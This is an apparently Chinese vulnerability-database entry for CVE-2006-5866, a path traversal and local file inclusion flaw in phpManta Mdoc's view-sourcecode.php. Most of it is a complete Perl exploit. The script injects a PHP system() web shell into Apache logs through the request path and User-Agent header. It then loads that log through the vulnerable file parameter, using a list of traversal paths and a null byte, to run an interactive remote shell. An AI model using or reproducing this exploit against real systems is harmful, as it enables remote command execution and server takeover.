phpManta Mdoc/view-sourcecode.php 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111506 漏洞类型 路径遍历
发布时间 2006-11-09 更新时间 2006-11-13
CVE编号 CVE-2006-5866 CNNVD-ID CNNVD-200611-190
漏洞平台 PHP CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/2748
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-190
|漏洞详情
phpManta中的Mdoc/view-sourcecode.php中存在目录遍历漏洞,远程攻击者可以通过在file参数(该参数中包含..)序列读取和包含任意文件。
|漏洞EXP
#!/usr/bin/perl
#[Script Name: phpManta - Mdoc <= 1.0.2 (view-sourcecode.php) Local File Include Exploit
#[Coded by   : ajann
#[Author     : ajann
#[Contact    : :(
use IO::Socket;
use LWP::Simple;
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
if (@ARGV < 3){
print "
[========================================================================
[//  phpManta - Mdoc <= 1.0.2 (view-sourcecode.php) Local File Include Exploit
[//           Usage: manta.pl [target] [path] [apachepath]
[//                   Example: manta.pl victim.com /manta/ ../logs/error.log
[//                           Vuln&Exp : ajann
[========================================================================
";
exit();
}

$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];

print "Injecting code in log files...\n";
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "Write END to exit!\n";
print "IF not working try another apache path\n\n";

print "[shell] ";$cmd = <STDIN>;

while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
    print $socket "GET ".$path."Mdoc/view-sourcecode.php?file=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
    {
        print $raspuns;
    }

    print "[shell] ";
    $cmd = <STDIN>;
}

# milw0rm.com [2006-11-09]
|参考资料

来源:XF
名称:phpmanta-view-file-include(30173)
链接:http://xforce.iss.net/xforce/xfdb/30173
来源:MILW0RM
名称:2748
链接:http://www.milw0rm.com/exploits/2748
来源:VUPEN
名称:ADV-2006-4445
链接:http://www.frsirt.com/english/advisories/2006/4445
来源:SECUNIA
名称:22734
链接:http://secunia.com/advisories/22734
来源:BID
名称:21008
链接:http://www.securityfocus.com/bid/21008
来源:BUGTRAQ
名称:20061111phpManta-Mdoc<=1.0.2(view-sourcecode.php)LocalFileIncludeExploit
链接:http://www.securityfocus.com/archive/1/archive/1/451318/100/0/threaded
来源:MILW0RM
名称:2748
链接:http://milw0rm.com/exploits/2748